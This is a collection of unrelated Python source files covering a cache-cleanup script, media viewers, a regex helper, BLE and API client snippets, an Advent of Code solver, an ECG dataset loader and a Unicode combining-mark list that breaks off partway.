    parser.add_argument('-max-keep-day', metavar='INT', dest='max_keep_days',
                        default=360, type=int, required=False,
                        help='The age of the cached result to be kept,\
                                (default: 360)')
    args = parser.parse_args()
    MAX_KEEP_DAYS = args.max_keep_days
    jsonfile = args.jsonfile
    if not os.path.exists(jsonfile):
        print(f"Jsonfile {jsonfile} does not exist. Exit {progname}!",
              file=sys.stderr)
        return 1
    g_params = {}
    g_params.update(webcom.LoadJsonFromFile(jsonfile))
    # Single-instance guard: take an exclusive, non-blocking lock on a file in
    # the log directory; a second concurrent run logs a message and exits.
    lockname = f"{rootname_progname}.lock"
    lock_file = os.path.join(g_params['path_log'], lockname)
    fp = open(lock_file, 'w')
    try:
        fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
    except IOError:
        webcom.loginfo(f"Another instance of {progname} is running",
                       g_params['gen_logfile'])
        return 1
    status = clean_cached_result(MAX_KEEP_DAYS, g_params)
    # NOTE(review): the lock handle ``fp`` is never closed/unlocked explicitly;
    # the lock is released only when the process exits — confirm intended.
    if os.path.exists(lock_file):
        try:
            os.remove(lock_file)
        except OSError:
            webcom.loginfo(f"Failed to delete lock_file {lock_file}",
                           g_params['gen_logfile'])
    return status
# }}}


if __name__ == '__main__':
    sys.exit(main())
|
'''
Randomly show files under specific path
07.12.2019
@chenz
'''
import FileDirectory as fd
import Show as sh
import random
import sys
import argparse
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
def main():
    """Parse CLI options, collect files under --path, and display them.

    Dispatch per --type:
      IMG / JPG / JPEG / PNG -> filter the file list, then sh.showImage
      Video                  -> filter, then sh.showVideo
      Any                    -> sh.openAny on the unfiltered list
    """
    # Process Parameters
    parser = argparse.ArgumentParser(description='Setup Parameters')
    parser.add_argument('--iters', default=1, type=int, help='Number of files to show')
    parser.add_argument('--interval', default=0, type=float, help='Show time for each file')
    parser.add_argument('--path', default='', type=str, help='Path for searching files')
    # BUG FIX: corrected "spports" typo in the user-facing help text.
    parser.add_argument('--type', default='IMG', type=str,
                        help='Type of file for search, currently supports IMG, JPG/JPEG, PNG')
    parser.add_argument('--sysImgApp', default=0, type=int,
                        help='Selection for use system application to open image or matplotlib')
    args = parser.parse_args()
    if not args.path:
        return
    file_list = fd.genAllFileDir(args.path)
    # All image-like types share the same viewer call; map each type to its
    # filter to avoid the triplicated showImage branches of the original.
    image_filters = {'IMG': fd.getImage, 'JPG': fd.getJPG, 'JPEG': fd.getJPG, 'PNG': fd.getPNG}
    if args.type in image_filters:
        files = image_filters[args.type](file_list)
        sh.showImage(files, iters=args.iters, interval=args.interval, sysImgApp=args.sysImgApp)
    elif args.type == 'Video':
        sh.showVideo(fd.getVideo(file_list))
    elif args.type == 'Any':
        sh.openAny(file_list)
    else:
        print('TODO')
        # TODO: support remaining file types.


if __name__ == "__main__":
    main()
|
"""Skeleton for a YouTube-playlist -> Spotify-playlist converter."""
import argparse  # BUG FIX: the original imported the nonexistent module ``argparser``


class Spotify():
    """Planned converter (not yet implemented).

    Steps:
    - get a URL from the command line (argparse)
    - make sure it is a playlist and contains music
    - for each of the songs, look it up on Spotify
    - create a playlist in Spotify
    - add the YouTube playlist's songs to the Spotify playlist
    """

    def main(self):
        """Entry point — conversion pipeline still to be written."""
        # TODO: implement the steps described in the class docstring.
        pass


# BUG FIXES: the original compared against the bare name ``__main__`` (a
# NameError) instead of the string "__main__", and called ``s.main()`` on an
# undefined name instead of the ``spotify`` instance it just created.
if __name__ == "__main__":
    spotify = Spotify()
    spotify.main()
# Python Standard Library Imports
import re
class Re(object):
    """Thin wrapper around :mod:`re` that remembers the last match object.

    Lets callers write ``if r.search(...): use(r.last_match)`` without
    repeating the call.  Every method accepts either a pattern string or a
    pre-compiled pattern object.
    """

    def __init__(self):
        # Match object from the most recent match/search/sub, or None.
        self.last_match = None

    @staticmethod
    def _is_compiled(pattern):
        """Return True if *pattern* is a pre-compiled regex object."""
        # BUG FIX: the original compared type(pattern).__name__ against
        # 'SRE_Pattern', which is never true on Python 3.7+ where the class
        # is re.Pattern; use isinstance instead.
        return isinstance(pattern, re.Pattern)

    def match(self, pattern, text):
        """Anchored match of *text* against *pattern*; records and returns the match."""
        if self._is_compiled(pattern):
            self.last_match = pattern.match(text)
        else:
            self.last_match = re.match(pattern, text)
        return self.last_match

    def search(self, pattern, text):
        """Search *text* for *pattern*; records and returns the match."""
        if self._is_compiled(pattern):
            self.last_match = pattern.search(text)
        else:
            self.last_match = re.search(pattern, text)
        return self.last_match

    def sub(self, pattern, repl, string, count=0, flags=0):
        """Like re.sub, recording the final match.

        ``last_match`` is set to the last match substituted, or None when no
        substitution occurred.  Note: *repl* is returned verbatim by the
        replacement callback, so backreferences are NOT expanded (original
        behavior preserved).
        """
        def frepl(matchobj):
            self.last_match = matchobj
            return repl

        if self._is_compiled(pattern):
            result, n = pattern.subn(frepl, string, count=count)
        else:
            result, n = re.subn(pattern, frepl, string, count=count, flags=flags)
        if n == 0:
            self.last_match = None
        return result
|
import pygatt
import logging

# Route pygatt's debug output to the console for troubleshooting BLE traffic.
logging.basicConfig()
logging.getLogger('pygatt').setLevel(logging.DEBUG)

# BGAPI backend drives a BlueGiga-style USB BLE dongle.
adapter = pygatt.BGAPIBackend()
try:
    adapter.start()
finally:
    # Always release the adapter/serial device, even if start() raised.
    adapter.stop()
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2007 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from mcni.components.NeutronPrinter import NeutronPrinter as enginefactory, category
from mcni.pyre_support.AbstractComponent import AbstractComponent
class NeutronPrinter( AbstractComponent ):

    # Expose the wrapped engine's docstring as this pyre component's docstring.
    __doc__ = enginefactory.__doc__

    class Inventory( AbstractComponent.Inventory ):
        # No extra user-configurable properties beyond the base Inventory;
        # the import is kept for pyre's inventory machinery.
        import pyre.inventory as pinv

    def process(self, neutrons):
        # Delegate neutron processing to the underlying engine.
        return self.engine.process( neutrons )

    def _configure(self):
        AbstractComponent._configure(self)
        return

    def _init(self):
        AbstractComponent._init(self)
        # The engine is created at init time, named after this component.
        self.engine = enginefactory( self.name )
        return

    pass # end of Source
# version
__id__ = "$Id$"
# End of file
|
# load("@io_bazel_rules_dotnet//dotnet:defs.bzl", "core_library", "core_resx")
# core_resx(
# name = "core_resource",
# src = "src/TestFramework/MSTest.Core/Resources/FrameworkMessages.resx",
# identifier = "Microsoft.VisualStudio.TestTools.UnitTesting.Resources.FrameworkMessages.resources",
# )
# core_library(
# name = "MSTest.Core.dll",
# srcs = glob(["testfx/src/TestFramework/MSTest.Core/**/*.cs"]) + glob([
# "testfx/src/TestFramework/Extension.Shared/**/*.cs",
# ]) + [
# "//testfx:Friends.cs",
# ],
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# resources = [":core_resource"],
# visibility = ["//visibility:public"],
# deps = [
# ":Extension.Core.dll",
# "@core_sdk_stdlib//:libraryset",
# ],
# )
# core_library(
# name = "Extension.Core.dll",
# srcs = glob(["src/TestFramework/Extension.Core/**/*.cs"]),
# defines = [
# ],
# keyfile = "@rules_dotnet_3rd_party//testfx:testfx.snk",
# visibility = ["//visibility:public"],
# deps = [
# "@core_sdk_stdlib//:libraryset",
# ],
# )
# core_library(
# name = "PlatformServices.Interface.dll",
# srcs = glob(["testfx/src/Adapter/PlatformServices.Interface/**/*.cs"]),
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# visibility = ["//visibility:public"],
# deps = [
# ":Extension.Core.dll",
# ":MSTest.Core.dll",
# "//vstest:Microsoft.VisualStudio.TestPlatform.ObjectModel.dll",
# "@core_sdk_stdlib//:libraryset",
# ],
# )
# core_library(
# name = "PlatformServices.Portable.dll",
# srcs = glob(["testfx/src/Adapter/PlatformServices.Portable/**/*.cs"]) + glob([
# "testfx/src/Adapter/PlatformServices.Shared/netstandard1.0/Services/**/*.cs",
# ]) + [
# "testfx/src/Adapter/PlatformServices.Shared/netstandard1.0/Constants.cs",
# ],
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# visibility = ["//visibility:public"],
# deps = [
# ":PlatformServices.Interface.dll",
# ],
# )
# core_resx(
# name = "adapter_resource",
# src = "testfx/src/Adapter/MSTest.CoreAdapter/Resources/Resource.resx",
# identifier = "Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.Resources.Resource.resources",
# )
# core_library(
# name = "Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll",
# srcs = glob(
# ["testfx/src/Adapter/MSTest.CoreAdapter/**/*.cs"],
# exclude = ["testfx/src/Adapter/MSTest.CoreAdapter/Execution/TestContextImpl.cs"],
# ),
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# resources = [
# ":adapter_resource",
# ],
# visibility = ["//visibility:public"],
# deps = [
# ":PlatformServices.Portable.dll",
# ],
# )
|
import ox3apiclient
import logging
import requests
import json
import report_config

# Authenticate against the OpenX API using credentials from the client's
# config file, and mirror the client's debug log to the console.
ox = ox3apiclient.client_from_file().logon()
ox.logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ox.logger.addHandler(ch)

# YOUR SETTINGS LOADED FROM 'report_config.py' file
date_range = report_config.date_range
# Request the date-range report; the payload is the JSON-encoded settings.
report = ox.post('/date-range/', data=json.dumps(date_range));
|
from typing import Optional
import xml.etree.ElementTree as ET
from ...xml.XmlReader import XmlReader as XR
from ..namespaces import API
from ..namespaces import DATA
from ...deserialization.create_enum import create_enum
from ..dto.AnnulmentData import AnnulmentData
from ..dto.AnnulmentVerificationStatus import AnnulmentVerificationStatus
def deserialize_annulment_data(element: ET.Element) -> Optional[AnnulmentData]:
if element is None:
return None
result = AnnulmentData(
annulment_verification_status=create_enum(AnnulmentVerificationStatus, XR.get_child_text(element, 'annulmentVerificationStatus', API)),
annulment_decision_date=XR.get_child_datetime(element, 'annulmentDecisionDate', API),
annulment_decision_user=XR.get_child_text(element, 'annulmentDecisionUser', API),
)
return result
|
# -*- coding: utf-8 -*-
# --- part one ---
def parse_inputs(file):
    """Read the puzzle input: return (initial_state, raw_rule_lines)."""
    with open(file, "r") as handle:
        lines = [line.rstrip() for line in handle]
    # Line 0 carries "initial state: ...", line 1 is blank, rules follow.
    initial_state = lines[0].split("initial state: ")[1]
    return initial_state, lines[2:]
# Parse the puzzle input and turn the raw rule lines ("LLCRR => N") into a
# {neighbourhood: result} lookup table.
state, rules = parse_inputs("input.txt")
rules = {r[0]: r[1] for r in [rule.split(" => ") for rule in rules]}
def spread_plant_nearby(state, rules, origin):
    """Advance the row of pots by one generation.

    Pads the row with 5 empty pots on each side so every reachable pot is
    evaluated, applies the 5-pot neighbourhood rules, then trims empty pots
    from both ends while tracking *origin* (pot number of the leftmost
    character of *state*).  Returns (new_state, new_origin).
    """
    state = f".....{state}....."
    origin += -3  # -5 for the dots and +2 because we loop from the 3rd element
    new_state = []
    for position in range(2, len(state) - 2):
        window = state[position - 2 : position + 3]
        # BUG FIX: a neighbourhood absent from the rules now leaves the pot
        # empty instead of raising KeyError (inputs may omit "-> ." rules).
        new_state.append(rules.get(window, "."))
    # BUG FIX: guard both trim loops so an all-empty generation cannot
    # IndexError on an empty list.
    while new_state and new_state[0] == ".":
        new_state.pop(0)
        origin += 1
    while new_state and new_state[-1] == ".":
        new_state.pop()
    return "".join(new_state), origin
def sum_position(state, origin):
    """Sum the pot numbers (index + origin) of all pots containing a plant."""
    total = 0
    for offset, pot in enumerate(state):
        if pot == "#":
            total += offset + origin
    return total
origin = 0
# Part 1: simulate exactly 20 generations and score the surviving pots.
for generation in range(1, 21):
    state, origin = spread_plant_nearby(state, rules=rules, origin=origin)
print(f"The answer of part 1 is: {sum_position(state, origin)}")

# --- part two ---
state, rules = parse_inputs("input.txt")
rules = {r[0]: r[1] for r in [rule.split(" => ") for rule in rules]}
N = 50_000_000_000
origin = 0
previous_filled_pots = 0
# Part 2: the pattern eventually reaches a steady shape that only shifts,
# adding a constant `delta` per generation — detect that and extrapolate.
for generation in range(1, N):
    new_state, origin = spread_plant_nearby(state, rules=rules, origin=origin)
    filled_pots = sum_position(new_state, origin)
    delta = filled_pots - previous_filled_pots
    if new_state == state:
        # Shape is stable: every remaining generation adds `delta` more.
        break
    state = new_state
    previous_filled_pots = filled_pots
result = (N - generation) * delta + filled_pots
print(f"The answer of part 2 is: {result}")
|
from os import listdir
from os.path import isfile, join, splitext

import numpy as np
import pandas as pd
import torch
import wfdb
from torch.utils import data
bit_per_sample = 11 # not used
freq = 360 # samples in sec - not used
SAMPLE_SIZE = 127
# Local path to the MIT-BIH CSV export (Windows-style, relative to cwd).
default_path_company = r'..\..\Data\MIT_BIH_CSV'
# Number of whole windows that fit in one record, keyed by window size.
NUM_of_windows = {
    4096: 158,
    2048: 316
}
class Dataset(data.Dataset):
    '''
    Characterizes a dataset for PyTorch.

    Each entry of ``list_IDs`` names one MIT-BIH record; every record is cut
    into ``NUM_of_windows[WINDOW_SIZE]`` consecutive windows of
    ``WINDOW_SIZE`` samples, and each (file, window) pair becomes one
    dataset element.
    '''
    def __init__(self, list_IDs, labels, typecast='float32', Normalize_scale=(0, 1), WINDOW_SIZE=4096):
        'Initialization'
        self.labels = labels
        # Half-open sample ranges [start, end) for every window of a record.
        # Named `windows` rather than `range` to avoid shadowing the builtin.
        windows = [(x * WINDOW_SIZE, (x + 1) * WINDOW_SIZE)
                   for x in range(NUM_of_windows[WINDOW_SIZE])]
        # One entry per (record file, window range) pair.
        self.final_dataset = []
        for file_name in list_IDs:
            self.final_dataset += [(file_name, window) for window in windows]
        print('MIT_BIH_loader initialized')
        self.norm_scale = Normalize_scale
        self.WINDOW_SIZE = WINDOW_SIZE

    def __len__(self):
        'Denotes the total number of samples'
        return len(self.final_dataset)

    def __getitem__(self, index):
        'Generates one sample of data'
        # Select sample: which record and which sample window within it.
        file_name, window = self.final_dataset[index]
        sempfrom, sempto = window
        # Load data and get label
        X, y = load_data(file_name, sempfrom, sempto)
        X = torch.from_numpy(np.array(X)).float()
        # A tuple norm_scale requests min-max normalisation into that range.
        if isinstance(self.norm_scale, tuple):
            X = (X - torch.min(X)) / (torch.max(X) - torch.min(X)) * (self.norm_scale[1] - self.norm_scale[0]) + \
                self.norm_scale[0]
        y = torch.from_numpy(np.array(y)).int()
        return X, y, file_name, sempfrom
def load_data(data__dir_path, offset=0, sampto='end'):
    """Load ECG samples and annotation indices from a record or directory.

    ``data__dir_path`` may be a single record file or a directory of records;
    channel-0 samples of every record are concatenated, as are the annotation
    sample indices (shifted to be relative to ``offset``).  Returns a
    ``(data_arr, anotation_arr)`` pair of 1-D numpy arrays.
    """
    only_files = [data__dir_path]
    if not isfile(data__dir_path):
        only_files = [join(data__dir_path, f) for f in listdir(data__dir_path) if isfile(join(data__dir_path, f))]
    data_arr = np.array([])
    anotation_arr = np.array([])
    for idx, file_path in enumerate(only_files):
        # wfdb wants the record name without its extension.  splitext is used
        # instead of split('.')[0], which truncated relative paths such as
        # '..\..\Data\rec.dat' at their first dot (yielding '').
        file_path = splitext(file_path)[0]
        signals, _ = wfdb.rdsamp(file_path, sampfrom=offset, sampto=sampto)
        data_file = signals[:,0] # ['\'V5\''] another option
        data_arr = np.concatenate((data_arr, data_file))
        try:
            annotation_file = wfdb.rdann(file_path, 'atr', sampfrom=offset, sampto=sampto).sample - offset
            anotation_arr = np.concatenate((anotation_arr, annotation_file.astype('int32')))
        except Exception as e:
            # Records without an .atr annotation file are tolerated.
            print(str(e))
        if idx % 10 == 0 and idx > 0:
            # Coarse progress indicator for directory loads.
            print((0.0 + idx) / len(only_files))
    return data_arr, anotation_arr
|
import sys
import timeit
import unicodedata
import numpy as np
UNICODE_NSM = [
"\u0300",
"\u0301",
"\u0302",
"\u0303",
"\u0304",
"\u0305",
"\u0306",
"\u0307",
"\u0308",
"\u0309",
"\u030A",
"\u030B",
"\u030C",
"\u030D",
"\u030E",
"\u030F",
"\u0310",
"\u0311",
"\u0312",
"\u0313",
"\u0314",
"\u0315",
"\u0316",
"\u0317",
"\u0318",
"\u0319",
"\u031A",
"\u031B",
"\u031C",
"\u031D",
"\u031E",
"\u031F",
"\u0320",
"\u0321",
"\u0322",
"\u0323",
"\u0324",
"\u0325",
"\u0326",
"\u0327",
"\u0328",
"\u0329",
"\u032A",
"\u032B",
"\u032C",
"\u032D",
"\u032E",
"\u032F",
"\u0330",
"\u0331",
"\u0332",
"\u0333",
"\u0334",
"\u0335",
"\u0336",
"\u0337",
"\u0338",
"\u0339",
"\u033A",
"\u033B",
"\u033C",
"\u033D",
"\u033E",
"\u033F",
"\u0340",
"\u0341",
"\u0342",
"\u0343",
"\u0344",
"\u0345",
"\u0346",
"\u0347",
"\u0348",
"\u0349",
"\u034A",
"\u034B",
"\u034C",
"\u034D",
"\u034E",
"\u034F",
"\u0350",
"\u0351",
"\u0352",
"\u0353",
"\u0354",
"\u0355",
"\u0356",
"\u0357",
"\u0358",
"\u0359",
"\u035A",
"\u035B",
"\u035C",
"\u035D",
"\u035E",
"\u035F",
"\u0360",
"\u0361",
"\u0362",
"\u0363",
"\u0364",
"\u0365",
"\u0366",
"\u0367",
"\u0368",
"\u0369",
"\u036A",
"\u036B",
"\u036C",
"\u036D",
"\u036E",
"\u036F",
"\u0483",
"\u0484",
"\u0485",
"\u0486",
"\u0487",
"\u0591",
"\u0592",
"\u0593",
"\u0594",
"\u0595",
"\u0596",
"\u0597",
"\u0598",
"\u0599",
"\u059A",
"\u059B",
"\u059C",
"\u059D",
"\u059E",
"\u059F",
"\u05A0",
"\u05A1",
"\u05A2",
"\u05A3",
"\u05A4",
"\u05A5",
"\u05A6",
"\u05A7",
"\u05A8",
"\u05A9",
"\u05AA",
"\u05AB",
"\u05AC",
"\u05AD",
"\u05AE",
"\u05AF",
"\u05B0",
"\u05B1",
"\u05B2",
"\u05B3",
"\u05B4",
"\u05B5",
"\u05B6",
"\u05B7",
"\u05B8",
"\u05B9",
"\u05BA",
"\u05BB",
"\u05BC",
"\u05BD",
"\u05BF",
"\u05C1",
"\u05C2",
"\u05C4",
"\u05C5",
"\u05C7",
"\u0610",
"\u0611",
"\u0612",
"\u0613",
"\u0614",
"\u0615",
"\u0616",
"\u0617",
"\u0618",
"\u0619",
"\u061A",
"\u064B",
"\u064C",
"\u064D",
"\u064E",
"\u064F",
"\u0650",
"\u0651",
"\u0652",
"\u0653",
"\u0654",
"\u0655",
"\u0656",
"\u0657",
"\u0658",
"\u0659",
"\u065A",
"\u065B",
"\u065C",
"\u065D",
"\u065E",
"\u065F",
"\u0670",
"\u06D6",
"\u06D7",
"\u06D8",
"\u06D9",
"\u06DA",
"\u06DB",
"\u06DC",
"\u06DF",
"\u06E0",
"\u06E1",
"\u06E2",
"\u06E3",
"\u06E4",
"\u06E7",
"\u06E8",
"\u06EA",
"\u06EB",
"\u06EC",
"\u06ED",
"\u0711",
"\u0730",
"\u0731",
"\u0732",
"\u0733",
"\u0734",
"\u0735",
"\u0736",
"\u0737",
"\u0738",
"\u0739",
"\u073A",
"\u073B",
"\u073C",
"\u073D",
"\u073E",
"\u073F",
"\u0740",
"\u0741",
"\u0742",
"\u0743",
"\u0744",
"\u0745",
"\u0746",
"\u0747",
"\u0748",
"\u0749",
"\u074A",
"\u07A6",
"\u07A7",
"\u07A8",
"\u07A9",
"\u07AA",
"\u07AB",
"\u07AC",
"\u07AD",
"\u07AE",
"\u07AF",
"\u07B0",
"\u07EB",
"\u07EC",
"\u07ED",
"\u07EE",
"\u07EF",
"\u07F0",
"\u07F1",
"\u07F2",
"\u07F3",
"\u0816",
"\u0817",
"\u0818",
"\u0819",
"\u081B",
"\u081C",
"\u081D",
"\u081E",
"\u081F",
"\u0820",
"\u0821",
"\u0822",
"\u0823",
"\u0825",
"\u0826",
"\u0827",
"\u0829",
"\u082A",
"\u082B",
"\u082C",
"\u082D",
"\u0859",
"\u085A",
"\u085B",
"\u08E4",
"\u08E5",
"\u08E6",
"\u08E7",
"\u08E8",
"\u08E9",
"\u08EA",
"\u08EB",
"\u08EC",
"\u08ED",
"\u08EE",
"\u08EF",
"\u08F0",
"\u08F1",
"\u08F2",
"\u08F3",
"\u08F4",
"\u08F5",
"\u08F6",
"\u08F7",
"\u08F8",
"\u08F9",
"\u08FA",
"\u08FB",
"\u08FC",
"\u08FD",
"\u08FE",
"\u0900",
"\u0901",
"\u0902",
"\u093A",
"\u093C",
"\u093E",
"\u0941",
"\u0942",
"\u0943",
"\u0944",
"\u0945",
"\u0946",
"\u0947",
"\u0948",
"\u094D",
"\u0951",
"\u0952",
"\u0953",
"\u0954",
"\u0955",
"\u0956",
"\u0957",
"\u0962",
"\u0963",
"\u0981",
"\u09BC",
"\u09C1",
"\u09C2",
"\u09C3",
"\u09C4",
"\u09CD",
"\u09E2",
"\u09E3",
"\u0A01",
"\u0A02",
"\u0A3C",
"\u0A41",
"\u0A42",
"\u0A47",
"\u0A48",
"\u0A4B",
"\u0A4C",
"\u0A4D",
"\u0A51",
"\u0A70",
"\u0A71",
"\u0A75",
"\u0A81",
"\u0A82",
"\u0ABC",
"\u0AC1",
"\u0AC2",
"\u0AC3",
"\u0AC4",
"\u0AC5",
"\u0AC7",
"\u0AC8",
"\u0ACD",
"\u0AE2",
"\u0AE3",
"\u0B01",
"\u0B3C",
"\u0B3F",
"\u0B41",
"\u0B42",
"\u0B43",
"\u0B44",
"\u0B4D",
"\u0B56",
"\u0B62",
"\u0B63",
"\u0B82",
"\u0BC0",
"\u0BCD",
"\u0C3E",
"\u0C3F",
"\u0C40",
"\u0C46",
"\u0C47",
"\u0C48",
"\u0C4A",
"\u0C4B",
"\u0C4C",
"\u0C4D",
"\u0C55",
"\u0C56",
"\u0C62",
"\u0C63",
"\u0CBC",
"\u0CBF",
"\u0CC6",
"\u0CCC",
"\u0CCD",
"\u0CE2",
"\u0CE3",
"\u0D41",
"\u0D42",
"\u0D43",
"\u0D44",
"\u0D4D",
"\u0D62",
"\u0D63",
"\u0DCA",
"\u0DD2",
"\u0DD3",
"\u0DD4",
"\u0DD6",
"\u0E31",
"\u0E34",
"\u0E35",
"\u0E36",
"\u0E37",
"\u0E38",
"\u0E39",
"\u0E3A",
"\u0E47",
"\u0E48",
"\u0E49",
"\u0E4A",
"\u0E4B",
"\u0E4C",
"\u0E4D",
"\u0E4E",
"\u0EB1",
"\u0EB4",
"\u0EB5",
"\u0EB6",
"\u0EB7",
"\u0EB8",
"\u0EB9",
"\u0EBB",
"\u0EBC",
"\u0EC8",
"\u0EC9",
"\u0ECA",
"\u0ECB",
"\u0ECC",
"\u0ECD",
"\u0F18",
"\u0F19",
"\u0F35",
"\u0F37",
"\u0F39",
"\u0F71",
"\u0F72",
"\u0F73",
"\u0F74",
"\u0F75",
"\u0F76",
"\u0F77",
"\u0F78",
"\u0F79",
"\u0F7A",
"\u0F7B",
"\u0F7C",
"\u0F7D",
"\u0F7E",
"\u0F80",
"\u0F81",
"\u0F82",
"\u0F83",
"\u0F84",
"\u0F86",
"\u0F87",
"\u0F8D",
"\u0F8E",
"\u0F8F",
"\u0F90",
"\u0F91",
"\u0F92",
"\u0F93",
"\u0F94",
"\u0F95",
"\u0F96",
"\u0F97",
"\u0F99",
"\u0F9A",
"\u0F9B",
"\u0F9C",
"\u0F9D",
"\u0F9E",
"\u0F9F",
"\u0FA0",
"\u0FA1",
"\u0FA2",
"\u0FA3",
"\u0FA4",
"\u0FA5",
"\u0FA6",
"\u0FA7",
"\u0FA8",
"\u0FA9",
"\u0FAA",
"\u0FAB",
"\u0FAC",
"\u0FAD",
"\u0FAE",
"\u0FAF",
"\u0FB0",
"\u0FB1",
"\u0FB2",
"\u0FB3",
"\u0FB4",
"\u0FB5",
"\u0FB6",
"\u0FB7",
"\u0FB8",
"\u0FB9",
"\u0FBA",
"\u0FBB",
"\u0FBC",
"\u0FC6",
"\u102D",
"\u102E",
"\u102F",
"\u1030",
"\u1032",
"\u1033",
"\u1034",
"\u1035",
"\u1036",
"\u1037",
"\u1039",
"\u103A",
"\u103D",
"\u103E",
"\u1058",
"\u1059",
"\u105E",
"\u105F",
"\u1060",
"\u1071",
"\u1072",
"\u1073",
"\u1074",
"\u1082",
"\u1085",
"\u1086",
"\u108D",
"\u109D",
"\u135D",
"\u135E",
"\u135F",
"\u1712",
"\u1713",
"\u1714",
"\u1732",
"\u1733",
"\u1734",
"\u1752",
"\u1753",
"\u1772",
"\u1773",
"\u17B4",
"\u17B5",
"\u17B7",
"\u17B8",
"\u17B9",
"\u17BA",
"\u17BB",
"\u17BC",
"\u17BD",
"\u17C6",
"\u17C9",
"\u17CA",
"\u17CB",
"\u17CC",
"\u17CD",
"\u17CE",
"\u17CF",
"\u17D0",
"\u17D1",
"\u17D2",
"\u17D3",
"\u17DD",
"\u180B",
"\u180C",
"\u180D",
"\u18A9",
"\u1920",
"\u1921",
"\u1922",
"\u1927",
"\u1928",
"\u1932",
"\u1939",
"\u193A",
"\u193B",
"\u1A17",
"\u1A18",
"\u1A56",
"\u1A58",
"\u1A59",
"\u1A5A",
"\u1A5B",
"\u1A5C",
"\u1A5D",
"\u1A5E",
"\u1A60",
"\u1A62",
"\u1A65",
"\u1A66",
"\u1A67",
"\u1A68",
"\u1A69",
"\u1A6A",
"\u1A6B",
"\u1A6C",
"\u1A73",
"\u1A74",
"\u1A75",
"\u1A76",
"\u1A77",
"\u1A78",
"\u1A79",
"\u1A7A",
"\u1A7B",
"\u1A7C",
"\u1A7F",
"\u1B00",
"\u1B01",
"\u1B02",
"\u1B03",
"\u1B34",
"\u1B36",
"\u1B37",
"\u1B38",
"\u1B39",
"\u1B3A",
"\u1B3C",
"\u1B42",
"\u1B6B",
"\u1B6C",
"\u1B6D",
"\u1B6E",
"\u1B6F",
"\u1B70",
"\u1B71",
"\u1B72",
"\u1B73",
"\u1B80",
"\u1B81",
"\u1BA2",
"\u1BA3",
"\u1BA4",
"\u1BA5",
"\u1BA8",
"\u1BA9",
"\u1BAB",
"\u1BE6",
"\u1BE8",
"\u1BE9",
"\u1BED",
"\u1BEF",
"\u1BF0",
"\u1BF1",
"\u1C2C",
"\u1C2D",
"\u1C2E",
"\u1C2F",
"\u1C30",
"\u1C31",
"\u1C32",
"\u1C33",
"\u1C36",
"\u1C37",
"\u1CD0",
"\u1CD1",
"\u1CD2",
"\u1CD4",
"\u1CD5",
"\u1CD6",
"\u1CD7",
"\u1CD8",
"\u1CD9",
"\u1CDA",
"\u1CDB",
"\u1CDC",
"\u1CDD",
"\u1CDE",
"\u1CDF",
"\u1CE0",
"\u1CE2",
"\u1CE3",
"\u1CE4",
"\u1CE5",
"\u1CE6",
"\u1CE7",
"\u1CE8",
"\u1CED",
"\u1CF4",
"\u1DC0",
"\u1DC1",
"\u1DC2",
"\u1DC3",
"\u1DC4",
"\u1DC5",
"\u1DC6",
"\u1DC7",
"\u1DC8",
"\u1DC9",
"\u1DCA",
"\u1DCB",
"\u1DCC",
"\u1DCD",
"\u1DCE",
"\u1DCF",
"\u1DD0",
"\u1DD1",
"\u1DD2",
"\u1DD3",
"\u1DD4",
"\u1DD5",
"\u1DD6",
"\u1DD7",
"\u1DD8",
"\u1DD9",
"\u1DDA",
"\u1DDB",
"\u1DDC",
"\u1DDD",
"\u1DDE",
"\u1DDF",
"\u1DE0",
"\u1DE1",
"\u1DE2",
"\u1DE3",
"\u1DE4",
"\u1DE5",
"\u1DE6",
"\u1DFC",
"\u1DFD",
"\u1DFE",
"\u1DFF",
"\u20D0",
"\u20D1",
"\u20D2",
"\u20D3",
"\u20D4",
"\u20D5",
"\u20D6",
"\u20D7",
"\u20D8",
"\u20D9",
"\u20DA",
"\u20DB",
"\u20DC",
"\u20E1",
"\u20E5",
"\u20E6",
"\u20E7",
"\u20E8",
"\u20E9",
"\u20EA",
"\u20EB",
"\u20EC",
"\u20ED",
"\u20EE",
"\u20EF",
"\u20F0",
"\u2CEF",
"\u2CF0",
"\u2CF1",
"\u2D7F",
"\u2DE0",
"\u2DE1",
"\u2DE2",
"\u2DE3",
"\u2DE4",
"\u2DE5",
"\u2DE6",
"\u2DE7",
"\u2DE8",
"\u2DE9",
"\u2DEA",
"\u2DEB",
"\u2DEC",
"\u2DED",
"\u2DEE",
"\u2DEF",
"\u2DF0",
"\u2DF1",
"\u2DF2",
"\u2DF3",
"\u2DF4",
"\u2DF5",
"\u2DF6",
"\u2DF7",
"\u2DF8",
"\u2DF9",
"\u2DFA",
"\u2DFB",
"\u2DFC",
"\u2DFD",
"\u2DFE",
"\u2DFF",
"\u302A",
"\u302B",
"\u302C",
"\u302D",
"\u3099",
"\u309A",
"\uA66F",
"\uA674",
"\uA675",
"\uA676",
"\uA677",
"\uA678",
"\uA679",
"\uA67A",
"\uA67B",
"\uA67C",
"\uA67D",
"\uA69F",
"\uA6F0",
"\uA6F1",
"\uA802",
"\uA806",
"\uA80B",
"\uA825",
"\uA826",
"\uA8C4",
"\uA8E0",
"\uA8E1",
"\uA8E2",
"\uA8E3",
"\uA8E4",
"\uA8E5",
"\uA8E6",
"\uA8E7",
"\uA8E8",
"\uA8E9",
"\uA8EA",
"\uA8EB",
"\uA8EC",
"\uA8ED",
"\uA8EE",
"\uA8EF",
"\uA8F0",
"\uA8F1",
"\uA926",
"\uA927",
"\uA928",
"\uA929",
"\uA92A",
"\uA92B",
"\uA92C",
"\uA92D",
"\uA947",
"\uA948",
